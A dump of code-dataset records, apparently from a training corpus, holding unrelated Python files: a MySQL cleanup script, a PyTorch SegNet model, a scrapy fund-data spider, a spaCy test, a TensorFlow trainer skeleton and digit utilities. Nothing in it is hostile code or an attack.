x=='l': jogadores[per]['inventario']=nomes.get(per).get('inventario')\n if res=='s': restaurar(per,'f',1)\n lvlup(xptotal,per,2)\n nomes={}\n with open('Beta/data/combatentes.json','w') as f:\n json.dump(nomes,f)\n return(n) \n","sub_path":"Sistema/scripts/batalha/iniciativa.py","file_name":"iniciativa.py","file_ext":"py","file_size_in_byte":8377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"981500","text":"#评论数据库后台操作操作包括:\n#从jd_%分类表里获得爬虫任务表中不存在的sku.\n#脚本是原来写的就不详细叙述了.\n# 分隔任务:\n# 1.将is_init=1的,sku找到每个sku的最新生成的任务的时间(start_time最大的),然后设置新建一条记录,start_time,post_time,end_time,page,is_init,error_frequency都要被设置。\n# 合并任务:\n# 1.status为=2的时候表示任务完成。那么合并的策略是从前面扫描。如果某个时间是完成的,那么直接将它后面的start_time=已经完成的这个start_time,并将当前的这个删除。\n# 清除超时任务:\n# 1.检查任务是否超时(task_time),如果超时,将is_employ置为0。\n\n\n#备注,任务基本完成\n\nimport pymysql\nimport time\nimport datetime\n\n\n\nimport pymysql\n\nSKU_TASK_TABLE = 'jd_comment_task'\nDATA_BASE_NAME='qfliu_db'\nimport traceback\n# 'qfliu_db'\n\n\ntry:\n mysql_conn = pymysql.connect(host='192.168.0.210', user='qfliu', passwd='333333', db=DATA_BASE_NAME, charset='utf8',\n connect_timeout=5000)\n cur=mysql_conn.cursor()\n mysql_conn.commit()\n cur.execute(\"select `sku` from %s.%s group by `sku` having count(`sku`)>1\" %(DATA_BASE_NAME,SKU_TASK_TABLE))\n skus=cur.fetchall()\n skus_len=len(skus)\n #生成新任务\n for i,sku in enumerate(skus):\n print(\".....................sku num=%s..............sku zongnumber=%s...............\" %(i,skus_len))\n sku=sku[0]\n cur.execute('SET SQL_SAFE_UPDATES=0;')\n cur.execute(\n \"select `id` from %s.%s \"\n \"where `id`=(select min(`id`) from %s.%s where sku='%s');\" % (DATA_BASE_NAME,SKU_TASK_TABLE,DATA_BASE_NAME,SKU_TASK_TABLE,sku)\n )\n infor=cur.fetchall()\n id=infor[0][0]\n cur.execute(\"delete from %s.%s where `sku`='%s' and `id` != %s;\" %(DATA_BASE_NAME,SKU_TASK_TABLE,sku,id))\n cur.execute('SET SQL_SAFE_UPDATES=1;')\n mysql_conn.commit()\n cur.close()\n mysql_conn.close()\nexcept Exception as e:\n traceback.print_exc(file='log_commit.log')","sub_path":"my_script/jd_commit_script/tmp_clear.py","file_name":"tmp_clear.py","file_ext":"py","file_size_in_byte":2109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"424613527","text":"\"\"\"\nThis is not an implementation for\nSegNet: A Deep Convolutional Encoder-Decoder Architecture for Image Segmentation\n\nI'll change the file names later\n\"\"\"\n\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass encoder(nn.Module):\n '''\n Encoder for the Segmentation network\n '''\n\n def __init__(self, batchNorm_momentum):\n super(encoder, self).__init__()\n self.main = nn.Sequential(\n nn.Conv2d(3, 64, 4, 2, 1, dilation=2, bias=False),\n # nn.BatchNorm2d(64, momentum=batchNorm_momentum),\n nn.ReLU(True),\n\n nn.Conv2d(64, 128, 4, 2, 1, dilation=2, bias=False),\n nn.BatchNorm2d(128, momentum=batchNorm_momentum),\n nn.ReLU(True),\n\n nn.Conv2d(128, 256, 4, 2, 1, dilation=2, bias=False),\n nn.BatchNorm2d(256, momentum=batchNorm_momentum),\n nn.ReLU(True),\n\n nn.Conv2d(256, 512, 4, 2, 1, dilation=2, bias=False),\n nn.BatchNorm2d(512, momentum=batchNorm_momentum),\n nn.ReLU(True),\n\n nn.Conv2d(512, 1024, 4, 1, 0, dilation=2, bias=False),\n nn.BatchNorm2d(1024, momentum=batchNorm_momentum),\n nn.ReLU(True)\n )\n\n def forward(self, input):\n output = self.main(input)\n return output\n\nclass decoder(nn.Module):\n '''\n Decoder for the Segmentation Network\n '''\n\n def 
__init__(self, batchNorm_momentum, num_classes=19):\n super(decoder, self).__init__()\n self.main = nn.Sequential(\n nn.ConvTranspose2d(1024, 512, 4, 1, 0, bias=False),\n nn.BatchNorm2d(512, momentum=batchNorm_momentum),\n nn.Dropout2d(),\n nn.ReLU(True),\n\n nn.ConvTranspose2d(512, 256, 4, 2, 1, bias=False),\n nn.BatchNorm2d(256, momentum=batchNorm_momentum),\n nn.Dropout2d(),\n nn.ReLU(True),\n\n nn.ConvTranspose2d(256, 128, 4, 2, 1, bias=False),\n nn.BatchNorm2d(128, momentum=batchNorm_momentum),\n nn.Dropout2d(),\n nn.ReLU(True),\n\n nn.ConvTranspose2d(128, 64, 4, 2, 1, bias=False),\n nn.BatchNorm2d(64, momentum=batchNorm_momentum),\n nn.ReLU(True),\n\n nn.ConvTranspose2d(64, num_classes, 4, 2, 1, bias=False),\n nn.Softmax(dim=1)\n )\n\n def forward(self, input):\n output = self.main(input)\n return output\n\nclass SegNet(nn.Module):\n '''\n Segnet network\n '''\n\n def __init__(self, batchNorm_momentum, num_classes):\n super(SegNet, self).__init__()\n self.encoder = encoder(batchNorm_momentum)\n self.decoder = decoder(batchNorm_momentum, num_classes)\n\n def forward(self, x):\n latent = self.encoder(x)\n print('Latent Shape')\n print(latent.shape)\n output = self.decoder(latent)\n\n return output\n\n def dice_loss(self, output, target, weights=None, ignore_index=None):\n '''\n output : NxCxHxW Variable\n target : NxHxW LongTensor\n weights : C FloatTensor\n ignore_index : int index to ignore from loss\n '''\n eps = 0.0001\n\n encoded_target = output.detach() * 0\n if ignore_index is not None:\n mask = target == ignore_index\n target = target.clone()\n target[mask] = 0\n encoded_target.scatter_(1, target.unsqueeze(1), 1)\n mask = mask.unsqueeze(1).expand_as(encoded_target)\n encoded_target[mask] = 0\n else:\n encoded_target.scatter_(1, target.unsqueeze(1), 1)\n\n if weights is None:\n weights = 1\n\n intersection = output * encoded_target\n numerator = 2 * intersection.sum(0).sum(1).sum(1)\n denominator = output + encoded_target\n\n if ignore_index is not None:\n denominator[mask] = 0\n denominator = denominator.sum(0).sum(1).sum(1) + eps\n loss_per_channel = weights * (1 - (numerator / denominator))\n\n return loss_per_channel.sum() / output.size(1)\n","sub_path":"model/segnet.py","file_name":"segnet.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"587491177","text":"import re\nimport urllib.parse\nimport json\nfrom scrapy import Request\nfrom FundNavSpiders import GGFundNavItem\nfrom FundNavSpiders import GGFundNavSpider\nfrom datetime import datetime\nfrom urllib.parse import urljoin\nfrom scrapy.utils.response import get_base_url\n\n\n\nclass UrichInvestSpider(GGFundNavSpider):\n name = 'FundNav_UrichInvest'\n sitename = '佑瑞持'\n channel = '投顾净值'\n allowed_domains = ['urich.cn']\n start_urls = ['http://www.urich.cn/']\n\n def __init__(self, limit=None, *args, **kwargs):\n super(UrichInvestSpider, self).__init__(limit, *args, **kwargs)\n\n def start_requests(self):\n\n yield Request(url='http://www.urich.cn/Risk.asp?temp=200', callback=self.parse)\n\n def parse(self, response):\n\n fps = [\n {\n 'url': 'http://www.urich.cn/product.asp',\n 'ref':'http://www.urich.cn/Risk.asp?temp=200'\n }\n ]\n\n yield self.request_next(fps, [])\n\n def parse_fund(self, response):\n fps = response.meta['fps']\n ips = response.meta['ips']\n ext = response.meta['ext']\n\n trs = response.xpath(\"//table[@class='pr_view']/tr\")\n for tr in trs[1:]:\n url = 
tr.xpath(\"./td[last()]/a/@href\").extract_first()\n if url != ''and url is not None:\n if 'http://www.ccbtrust.com.cn/templates/second/index.aspx?nodeid=15&page=ContentPage&' not in url:\n ips.append({\n 'url': url,\n 'ref': 'http://www.urich.cn/product.asp',\n })\n\n yield self.request_next([], ips)\n\n def parse_item(self, response):\n fps = response.meta['fps']\n ips = response.meta['ips']\n ext = response.meta['ext']\n fund_name = ''\n url = response.url\n if 'https://www.bjitic.com/sun_info-49-52.html' in url:\n content_name = response.xpath('//div[@class=\"item\"]/div[2]/text()').extract_first()\n fund_name = content_name.split(':')[1]\n dataList = response.xpath('//div[@class=\"qmm_lb\"]/table/tr')\n for data in dataList[1:]:\n item = GGFundNavItem()\n item['sitename'] = self.sitename\n item['channel'] = self.channel\n item['url'] = response.url\n\n item['fund_name'] = fund_name\n\n statistic_date = data.xpath('./td[1]/text()').extract_first()\n statistic_date = str(statistic_date).split(\" \")[0] if statistic_date is not None else None\n statistic_date = datetime.strptime(statistic_date, '%Y-%m-%d')\n item['statistic_date'] = statistic_date\n\n nav = data.xpath('./td[2]/text()').extract_first()\n nav = re.search(r'([0-9.]+)', str(nav))\n nav = nav.group(0) if nav is not None else None\n item['nav'] = float(nav)/10000 if nav is not None else None\n\n added_nav = data.xpath('./td[3]/text()').extract_first()\n added_nav = re.search(r'([0-9.]+)', str(added_nav))\n added_nav = added_nav.group(0) if added_nav is not None else None\n item['added_nav'] = float(added_nav)/10000 if added_nav is not None else None\n\n yield item\n\n if 'https://mall.essence.com.cn/mall/views/financial/detail' in url:\n fund_code = url.rsplit('/',1)[1].split('.')[0]\n fund_name = response.xpath('//div[@class=\"lc_b2 reset_lc_b2\"]/b/text()').extract_first()\n url = 'https://mall.essence.com.cn/servlet/json?funcNo=1000055&product_code='+fund_code+'&numPerPage=10&start_date=&end_date=&fund_type=0&page=1'\n ips.append({\n 'url': url,\n 'ref': 'https://mall.essence.com.cn/mall/views/financial/detail/'+fund_code+'.html',\n 'ext':{'financial':'financial','fund_name':fund_name,'fund_code':fund_code}\n })\n\n if 'financial' in ext:\n fund_name = ext['fund_name']\n fund_code = ext['fund_code']\n totalRows = json.loads(response.text)['results'][0]['totalRows']\n url = 'https://mall.essence.com.cn/servlet/json?funcNo=1000055&product_code=' + str(fund_code) + '&page=1&start_date=&end_date=&fund_type=0&numPerPage=' + str(totalRows)\n ips.append({\n 'url': url,\n 'ref': 'https://mall.essence.com.cn/mall/views/financial/detail/' + str(fund_code) + '.html',\n 'ext': {'financialList': 'financialList', 'fund_name': fund_name, 'fund_code': fund_code}\n })\n\n if 'financialList' in ext:\n fund_name = ext['fund_name']\n fund_code = ext['fund_code']\n datas = json.loads(response.text)['results'][0]['data']\n for data in datas:\n item = GGFundNavItem()\n item['sitename'] = self.sitename\n item['channel'] = self.channel\n item['url'] = response.url\n\n item['fund_name'] = fund_name\n\n statistic_date = data['nav_date']\n #self.logger.info('statistic_date:'+statistic_date)\n statistic_date = str(statistic_date).split(\" \")[0] if statistic_date is not None else None\n statistic_date = datetime.strptime(statistic_date, '%Y-%m-%d')\n item['statistic_date'] = statistic_date\n\n nav = data['nav']\n #self.logger.info('nav:' + nav )\n nav = re.search(r'([0-9.]+)', str(nav))\n nav = nav.group(0) if nav is not None else None\n item['nav'] = 
float(nav) / 10000 if nav is not None else None\n\n added_nav = data['cumulative_net']\n #self.logger.info('added_nav:' + added_nav)\n added_nav = re.search(r'([0-9.]+)', str(added_nav))\n added_nav = added_nav.group(0) if added_nav is not None else None\n item['added_nav'] = float(added_nav) / 10000 if added_nav is not None else None\n\n yield item\n\n if 'http://www.ciit.com.cn/xingyetrust-web/netvalues/netvalue!getHistoryNetValue' in url:\n url = response.url\n fund_name = url.rsplit('=',1)[1]\n fund_name = urllib.parse.unquote(fund_name)\n fund_url = 'http://www.ciit.com.cn/funds-struts/fund-net-chart-table/XY056X?from=&to=&page=1-16'\n ips.append({\n 'url': fund_url,\n 'ref': 'http://www.ciit.com.cn/xingyetrust-web/netvalues/netvalue!getHistoryNetValue?fundCode=XY056X&fundname=%E5%85%B4%E4%B8%9A%E4%BF%A1%E6%89%98%C2%B7%E4%BD%91%E7%91%9E%E6%8C%81%E4%BC%98%E4%BA%AB%E7%BA%A2%E5%88%A9%E8%AF%81%E5%88%B8%E6%8A%95%E8%B5%84%E9%9B%86%E5%90%88%E8%B5%84%E9%87%91%E4%BF%A1%E6%89%98%E8%AE%A1%E5%88%92',\n 'ext': {'HistoryNetValue': 'HistoryNetValue', 'fund_name': fund_name}\n })\n\n if 'HistoryNetValue' in ext:\n fund_name = ext['fund_name']\n last_url = response.xpath('//div[@class=\"dtitle_t\"]/table/tr/td[2]/a[last()]/@href').extract_first()\n href = urljoin(get_base_url(response), last_url)\n last_page = href.rsplit('=',1)[1].split('-')[0]\n fund_url = href.rsplit('=',1)[0]\n for page in range(1, int(last_page) + 1):\n url = fund_url + '=' + str(page) + '-16'\n ips.append({\n 'url': url,\n 'ref': 'http://www.ciit.com.cn/xingyetrust-web/netvalues/netvalue!getHistoryNetValue?fundCode=XY056X&fundname=%E5%85%B4%E4%B8%9A%E4%BF%A1%E6%89%98%C2%B7%E4%BD%91%E7%91%9E%E6%8C%81%E4%BC%98%E4%BA%AB%E7%BA%A2%E5%88%A9%E8%AF%81%E5%88%B8%E6%8A%95%E8%B5%84%E9%9B%86%E5%90%88%E8%B5%84%E9%87%91%E4%BF%A1%E6%89%98%E8%AE%A1%E5%88%92',\n 'ext': {'HistoryNetValueList': 'HistoryNetValueList', 'fund_name': fund_name}\n })\n\n if 'HistoryNetValueList' in ext:\n fund_name = ext['fund_name']\n datas = response.xpath('//table[@class=\"table2\"]/tr')\n for data in datas[1:]:\n item = GGFundNavItem()\n item['sitename'] = self.sitename\n item['channel'] = self.channel\n item['url'] = response.url\n\n item['fund_name'] = fund_name\n\n statistic_date = data.xpath('./td[1]/text()').extract_first()\n statistic_date = str(statistic_date).split(\" \")[0] if statistic_date is not None else None\n statistic_date = datetime.strptime(statistic_date, '%Y-%m-%d')\n item['statistic_date'] = statistic_date\n\n nav = data.xpath('./td[2]/text()').extract_first()\n nav = re.search(r'([0-9.]+)', str(nav))\n nav = nav.group(0) if nav is not None else None\n item['nav'] = float(nav) / 10000 if nav is not None else None\n\n yield item\n\n yield self.request_next(fps, ips)","sub_path":"FundNavSpiders/UrichInvest.py","file_name":"UrichInvest.py","file_ext":"py","file_size_in_byte":9539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"572051627","text":"\n\n#calss header\nclass _WAGER():\n\tdef __init__(self,): \n\t\tself.name = \"WAGER\"\n\t\tself.definitions = [u'an amount of money that you risk in the hope of winning more, by trying to guess something uncertain, or the agreement that you make to take this risk: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn 
self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_wager.py","file_name":"_wager.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"608841032","text":"\nfrom conftest import MY_PREAMBLE\n\ndef test_spacy_parts_of_speech(nlp):\n doc = nlp(\"Hello World!!!\") #> \n assert [str(token) for token in doc] == [\"Hello\", \"World\", \"!\", \"!\", \"!\"]\n assert [token.pos_ for token in doc] == ['INTJ', 'PROPN', 'PUNCT', 'PUNCT', 'PUNCT']\n\n doc = nlp(MY_PREAMBLE) #> \n assert [str(token) for token in doc] == [\n 'Friends', ',', 'Romans', ',', 'countrymen', ',',\n 'lend', 'me', 'your', 'ears', ';', '911'\n ]\n assert [token.pos_ for token in doc] == [\n 'NOUN', 'PUNCT', 'PROPN', 'PUNCT', 'NOUN', 'PUNCT',\n 'VERB', 'PRON', 'PRON', 'NOUN', 'PUNCT', 'NUM'\n ]\n","sub_path":"test/parts_of_speech_test.py","file_name":"parts_of_speech_test.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"78237620","text":"import tensorflow as tf\nimport numpy as np\nimport os\nimport time\n\nclass TrainerNN:\n '''\n The base class for training neural networks. It provides the basic wiring and commonly shared code. Inherited\n classes should override the following methods:\n\n - _create_placeholders()\n - _create_model()\n - _create_feed_dictionary()\n\n The inherited class is used by calling the following two methods:\n - create_net()\n - train()\n\n '''\n\n def __init__(self):\n self.modes = ['train', 'validation']\n self.summary_writer = None\n\n def get_num_of_trainable_variables(self):\n '''\n This is very useful for sanity checking. If you have a wrong idea of how many variables you are using,\n something is very wrong (with you or with the code).\n :return: number of *trainable* variables in the graph\n '''\n return np.sum([np.prod(v.shape) for v in tf.trainable_variables()])\n\n ################################################################################################################\n #\n # THE FOLLOWING THREE METHODS SHOULD BE OVERRIDDEN IN SUBCLASSES\n #\n ################################################################################################################\n\n def _create_placeholders(self):\n pass\n\n def _create_model(self, arch):\n pass\n\n def _create_feed_dictionary(self, batch, is_training):\n pass\n\n ################################################################################################################\n #\n # THE USUAL STUFF\n #\n ################################################################################################################\n\n def _create_loss(self):\n with tf.name_scope('loss'):\n self.labels = tf.one_hot(self.y, 2)\n self.loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=self.labels, logits=self.logits))\n\n def _create_prediction(self):\n with tf.name_scope('prediction'):\n self.prediction = tf.to_int32(tf.argmax(self.logits, axis=1))\n\n def _calculate_f1_score(self):\n '''\n F1 score is used instead of accuracy in case of strongly biased classes. 
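# A plain-Python sanity check of the F1 computation built in TensorFlow below; this is
# an illustrative sketch, not part of the dataset record:
def f1_score(y_true, y_pred):
    tp = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 1)
    fp = sum(1 for t, p in zip(y_true, y_pred) if t == 0 and p == 1)
    fn = sum(1 for t, p in zip(y_true, y_pred) if t == 1 and p == 0)
    precision = tp / (tp + fp)  # assumes at least one positive prediction
    recall = tp / (tp + fn)     # assumes at least one positive label
    return 2 * precision * recall / (precision + recall)

# f1_score([1, 0, 0, 0], [1, 1, 0, 0]) == 2 * 0.5 * 1.0 / 1.5 ~= 0.667 while accuracy is
# 0.75; on strongly biased classes that gap is exactly why F1 is preferred to accuracy.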
Google it up :)\n :return: F1 score, what else?!?\n '''\n with tf.name_scope('stats'):\n prediction = self.prediction\n y = self.y\n with tf.name_scope('true_positive'):\n tp = tf.reduce_sum(tf.to_int32(tf.logical_and(tf.equal(prediction, y), tf.equal(prediction, 1))))\n with tf.name_scope('true_negative'):\n tn = tf.reduce_sum(tf.to_int32(tf.logical_and(tf.equal(prediction, y), tf.equal(prediction, 0))))\n with tf.name_scope('false_positive'):\n fp = tf.reduce_sum(tf.to_int32(tf.logical_and(tf.not_equal(prediction, y), tf.equal(prediction, 1))))\n with tf.name_scope('false_negative'):\n fn = tf.reduce_sum(tf.to_int32(tf.logical_and(tf.not_equal(prediction, y), tf.equal(prediction, 0))))\n\n with tf.name_scope('precision'):\n self.precision = tp / (tp + fp)\n with tf.name_scope('recall'):\n self.recall = tp / (tp + fn)\n with tf.name_scope('accuracy'):\n self.accuracy = (tp+tn) / (tp+tn+fp+fn)\n\n with tf.name_scope('f1_score'):\n self.f1_score = 2 * self.precision * self.recall / (self.precision + self.recall)\n\n def _create_optimizer(self):\n '''\n We use Adam optimizer, no need to experiment further.\n :return:\n '''\n with tf.name_scope('optimizer'):\n self.global_step = tf.Variable(0, trainable=False, dtype=tf.int32, name='global_step')\n\n self.lr = tf.train.exponential_decay(learning_rate=self.learning_rate,\n global_step=self.global_step,\n decay_steps=self.decay_steps,\n decay_rate=self.decay_rate,\n name='learning_rate')\n\n # this is needed by tf.contrib.layers.batch_norm():\n # moving averages must be updated, otherwise batch normalization would not work\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n self.optimizer = tf.train.AdamOptimizer(learning_rate=self.lr).minimize(self.loss, global_step=self.global_step)\n\n def create_net(self, arch, learning_rate=0.001, decay_steps=20, decay_rate=0.999):\n '''\n Creates neural network by calling all the functions in the right order.\n :param arch: data structure used by the _create_model(), typically the number and size of hidden layers or keep_prob for dropout\n :param learning_rate:\n :param decay_steps:\n :param decay_rate:\n :return:\n '''\n # clear everything (important for summaries)\n tf.reset_default_graph()\n\n # save for latter\n self.arch = arch\n self.learning_rate = learning_rate\n self.decay_steps = decay_steps\n self.decay_rate = decay_rate\n\n # create network and do all the wiring\n # do not change the order because something might break (it will)\n self._create_placeholders()\n self._create_model(arch)\n self._create_loss()\n self._create_prediction()\n self._calculate_f1_score()\n self._create_optimizer()\n\n # create summary writters for train and validation sets\n self._create_summary_writers()\n\n def _calculate_stats(self, data, batch_size, data_set, sess):\n read_batch = data.read_batch(batch_size, data_set)\n\n stats = np.zeros(5)\n total = 0\n for batch in read_batch:\n size = len(batch)\n feed_dict = self._create_feed_dictionary(batch, is_training=False)\n stats += size * np.array(sess.run([self.loss, self.accuracy, self.precision, self.recall, self.f1_score],\n feed_dict=feed_dict))\n total += size\n stats = stats / total\n names = ['loss', 'accuracy', 'precision', 'recall', 'f1_score']\n return {name: stats[i] for i, name in enumerate(names)}\n\n def train(self, data, batch_size, epochs, skip_steps=20):\n '''\n Train network.\n :param data: data source\n :param batch_size: batch size :)\n :param epochs: number of epochs to train :)\n :param 
skip_steps: number of steps to make before writing summaries out\n '''\n\n start = time.time()\n with tf.Session() as sess:\n # restore checkpoint if possible\n # if not, initialize variables and start from beginning\n self._create_checkpoint_saver()\n if not self._restore_checkpoint(sess):\n sess.run(tf.global_variables_initializer())\n\n for i in range(epochs):\n train_read_batch = data.read_batch(batch_size, 'train')\n validation_read_batch = data.read_batch(batch_size, 'validation', endless=True)\n for train_batch in train_read_batch:\n train_feed_dict = self._create_feed_dictionary(train_batch, is_training=True)\n # calculate current loss without updating variables\n global_step, train_loss = sess.run([self.global_step, self.loss], feed_dict=train_feed_dict)\n if global_step % skip_steps == 0:\n # write train summary\n train_feed_dict = self._create_feed_dictionary(train_batch, is_training=False)\n train_loss = self._add_summary(sess, train_feed_dict, 'train')\n\n # calculate validation loss and write summary\n validation_feed_dict = self._create_feed_dictionary(next(validation_read_batch), is_training=False)\n validation_loss = self._add_summary(sess, validation_feed_dict, 'validation')\n\n # save checkpoint\n self._save_checkpoint(sess)\n\n # printout losses\n print('[{:05d}/{:.1f} sec] train/validation loss = {:.5f}/{:.5f}'.\\\n format(global_step, time.time() - start, train_loss, validation_loss))\n\n # finally, do the backpropagation and update the variables\n sess.run(self.optimizer, feed_dict=train_feed_dict)\n self._flush_summaries()\n stats = self._calculate_stats(data, batch_size, 'validation', sess)\n return global_step, stats\n\n ################################################################################################################\n #\n # SUMMARY STUFF\n #\n ################################################################################################################\n\n def name_extension(self):\n desc = {type(self).__name__: None}\n desc.update(self.arch)\n desc.update({\n 'lr': str(self.learning_rate),\n 'dr': str(self.decay_rate),\n 'ds': str(self.decay_steps)})\n return os.path.join(*[('{}-{}' if (desc[k] is not None) else '{}').format(k, desc[k]).replace(\" \", \"\").replace('[', '(').replace(']', ')') for k in desc.keys()])\n\n def _create_summaries(self):\n with tf.name_scope('summaries'):\n tf.summary.scalar('lr', self.lr)\n tf.summary.scalar('loss', self.loss)\n tf.summary.scalar('f1_score', self.f1_score)\n tf.summary.scalar('precision', self.precision)\n tf.summary.scalar('recall', self.recall)\n tf.summary.scalar('accuracy', self.accuracy)\n\n self.summary = tf.summary.merge_all()\n\n def _create_summary_writers(self):\n modes = self.modes\n\n # close old summary writers\n if self.summary_writer is not None:\n for mode in modes:\n self.summary_writer[mode].close()\n\n self._create_summaries()\n graph = tf.get_default_graph()\n name_extension = self.name_extension()\n\n self.summary_writer = {mode: tf.summary.FileWriter(os.path.join('graphs', mode, name_extension), graph) for mode in modes}\n\n def _add_summary(self, sess, feed_dict, mode):\n loss, summary, global_step = sess.run([self.loss, self.summary, self.global_step], feed_dict=feed_dict)\n self.summary_writer[mode].add_summary(summary, global_step=global_step)\n return loss\n\n def _flush_summaries(self):\n for mode in self.modes:\n self.summary_writer[mode].flush()\n\n ################################################################################################################\n #\n # 
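# _calculate_stats above accumulates size-weighted metrics and divides by the total
# count, so a short final batch does not skew the averages. The same pattern in
# isolation, with made-up numbers (illustrative sketch, not from the record):
batch_losses = [(32, 0.50), (32, 0.40), (8, 0.80)]  # (batch_size, mean loss per batch)
weighted_mean = sum(n * v for n, v in batch_losses) / sum(n for n, _ in batch_losses)
# (16.0 + 12.8 + 6.4) / 72 ~= 0.489, versus a naive mean of the three losses ~= 0.567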
CHECKPOINT STUFF\n #\n ################################################################################################################\n\n def _create_checkpoint_saver(self):\n self.checkpoint_namebase = os.path.join('checkpoints', self.name_extension(), 'checkpoint')\n self.checkpoint_path = os.path.dirname(self.checkpoint_namebase)\n os.makedirs(self.checkpoint_path, exist_ok=True)\n print('Checkpoint directory is:', os.path.abspath(self.checkpoint_path))\n\n print('Creating tf.train.Saver()...', end='')\n self.saver = tf.train.Saver()\n print('done')\n return self.saver\n\n def _save_checkpoint(self, sess):\n saver = self.saver\n\n saved_path = saver.save(sess, self.checkpoint_namebase, global_step=self.global_step)\n return saved_path\n\n def _restore_checkpoint(self, sess):\n saver = self.saver\n\n ckpt = tf.train.get_checkpoint_state(self.checkpoint_path)\n print('self.checkpoint_path:', self.checkpoint_path)\n print('ckpt:', ckpt)\n if ckpt and ckpt.model_checkpoint_path:\n print('ckpt.model_checkpoint_path:', ckpt.model_checkpoint_path)\n saver.restore(sess, ckpt.model_checkpoint_path)\n return True\n return False\n\nclass TrainerFF(TrainerNN):\n '''\n A simple feed-forward neural network classifier whose primary purpose is testing of the TrainerNN skeleton.\n\n It assumes that output is an integer denoting index of a class ([0, n) for n classes).\n '''\n\n def __init__(self, input_size):\n self.input_size = input_size\n super().__init__()\n\n def _create_placeholders(self):\n '''\n Creates placeholders for input and dropout parameters.\n :return:\n '''\n with tf.name_scope('input_data'):\n with tf.name_scope('batch'):\n self.X = tf.placeholder(tf.float32, shape=[None, self.input_size], name='X')\n self.y = tf.placeholder(tf.int32, shape=[None], name='y')\n self.keep_prob = tf.placeholder(tf.float32, name='keep_prob')\n self.input_keep_prob = tf.placeholder(tf.float32, name='input_keep_prob')\n self.batch_norm_decay = tf.placeholder(tf.float32, name='batch_norm_decay')\n self.is_training = tf.placeholder(tf.bool, name='is_training')\n return self.X, self.y, self.keep_prob\n\n def _fully_connected_layer_with_dropout_and_batch_norm(self, input_data, num_outputs, use_batch_normalization):\n # skip bias if we are using batch normalization\n if use_batch_normalization:\n # matmul -> batch_norm without scale -> ReLU\n h = tf.contrib.layers.fully_connected(input_data, num_outputs, activation_fn=None, biases_initializer=None)\n h = tf.contrib.layers.batch_norm(h, decay=self.batch_norm_decay, scale=False,\n is_training=self.is_training, activation_fn=tf.nn.relu)\n else:\n h = tf.contrib.layers.fully_connected(input_data, num_outputs)\n h = tf.nn.dropout(h, keep_prob=self.keep_prob)\n return h\n\n def _create_model(self, arch):\n '''\n Creates fully connected network.\n :param arch: list of hidden layer sizes\n '''\n use_batch_normalization = arch['use_batch_norm']\n no_of_layers = arch['no_of_layers']\n hidden_size = arch['hidden_size']\n\n with tf.name_scope('model'):\n with tf.name_scope('input_dropout'):\n h = tf.nn.dropout(self.X, keep_prob=self.input_keep_prob)\n for i in range(no_of_layers):\n with tf.name_scope('fc_layer_{}'.format(i)):\n h = self._fully_connected_layer_with_dropout_and_batch_norm(h, hidden_size, use_batch_normalization)\n\n # linear classifier at the end\n with tf.name_scope('lin_layer'):\n self.logits = tf.contrib.layers.fully_connected(h, 2, activation_fn=None)\n\n def _create_feed_dictionary(self, batch, is_training):\n X, y = batch\n if is_training:\n keep_prob 
= self.arch['keep_prob']\n input_keep_prob = self.arch['input_keep_prob']\n else:\n keep_prob = 1.0\n input_keep_prob = 1.0\n batch_norm_decay = self.arch['batch_norm_decay']\n\n return {self.X: X,\n self.y: y,\n self.keep_prob: keep_prob,\n self.input_keep_prob: input_keep_prob,\n self.batch_norm_decay: batch_norm_decay,\n self.is_training: is_training}\n\n","sub_path":"repsly_challenge/trainer_nn.py","file_name":"trainer_nn.py","file_ext":"py","file_size_in_byte":15466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"177846729","text":"'''\nOperations dealing with the digits of numbers\n\n@author: ben\n'''\n\nfrom collections import deque\nfrom itertools import islice\n\n#### Manipulate the digits of a number ####\ndef ndigits(N, base=10):\n if base == 10:\n return len(str(N))\n else:\n return len(digits(N, base))\n\ndef digits(N, base=10, use_map=True):\n \"\"\"Returns the digits of N as a list\"\"\"\n if (not use_map) or (base != 10):\n result = []\n while N > 0:\n digit = N % base\n result.append(digit)\n N //= base\n result.reverse()\n else:\n result = [int(c) for c in str(N)]\n return result\n\ndef rotate(N, n):\n \"\"\"Rotates the digits of N by n\"\"\"\n # This likely doesn't need a deque, I'm just lazy\n d = deque(digits(N))\n d.rotate(n)\n return assemble(d)\n\ndef trunc(N, n, base=10):\n \"\"\"Truncates a number by n digits from the right (positive) or left (negative)\"\"\"\n if n > 0:\n ret = N // (base ** n)\n else:\n ret = N % (base ** (ndigits(N) - abs(n)))\n return ret\n\ndef assemble(digits, base=10):\n \"\"\"Assembles a list of digits into a number\"\"\"\n number = 0\n for i in range(len(digits)):\n number += int(digits[-i - 1]) * (base ** i)\n return number\n\n#### Find or generate palindromic numbers ####\ndef is_palindrome(N, base=10, use_map=True):\n for f, b in zip(digits(N, base, use_map), reversed(digits(N, base, use_map))):\n if f != b:\n return False\n return True\n\ndef palindrome_gen():\n \"\"\"Generator for palindromic numbers\"\"\"\n even = False\n n = 0\n old_digits = 1\n while 1:\n n += 1\n if ndigits(n) > old_digits:\n # Retrace after odd numbers\n if not even:\n n //= 10\n # Switch to even/odd\n even = not even\n old_digits = ndigits(n)\n\n if even:\n pal = assemble(digits(n) + list(reversed(digits(n))))\n else:\n pal = assemble(digits(n) + 